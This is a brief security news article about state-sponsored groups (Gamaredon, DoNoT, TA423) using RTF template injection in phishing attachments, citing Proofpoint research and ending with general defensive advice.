State-sponsored hacker outfits are increasingly employing the new RTF Template Injection attack method. Attacks are getting more difficult to identify and avoid as a result of the use of this strategy.
The RTF Template Injection attack method is a novel variant of the classic template injection attack. The method is based on a Microsoft Office feature that allows users to generate a document using a specified template. Using an RTF file, attackers can retrieve malicious material from a remote URL. For harmful phishing attachments, RTF template injection is best suited. It is commonly used in the threat environment owing to its simplicity and efficacy when compared to other phishing attachment template injection tactics.
According to a recent investigation, APT organisations from Russia, India, and China are using the RTF Template Injection approach. This approach has also been used by a number of financially motivated threat actors. Proofpoint researchers uncovered three state-sponsored entities utilising the RTF Template Injection technique: Gamaredon (Russia), DoNoT (India), and TA423 (China). DoNoT and TA423 were the first to employ this method. They utilised RTF documents that included malicious templates. DoNoT’s RTF Template Injection attacks began in March and lasted until July, while TA423 assaults were discovered in September, targeting Malaysian energy businesses. Gamaredon, the Russian FSB intelligence organisation, is the most recent APT actor to employ this tactic. In October, the organisation pretended to be a government agency by using RTF files.
According to analysts, the efficacy of template injection assaults may lead to their continued use by APT organizations. Furthermore, botnet and ransomware groups may use this strategy in the future. To be safe, enterprises should employ network/host intrusion prevention systems and dependable anti-malware.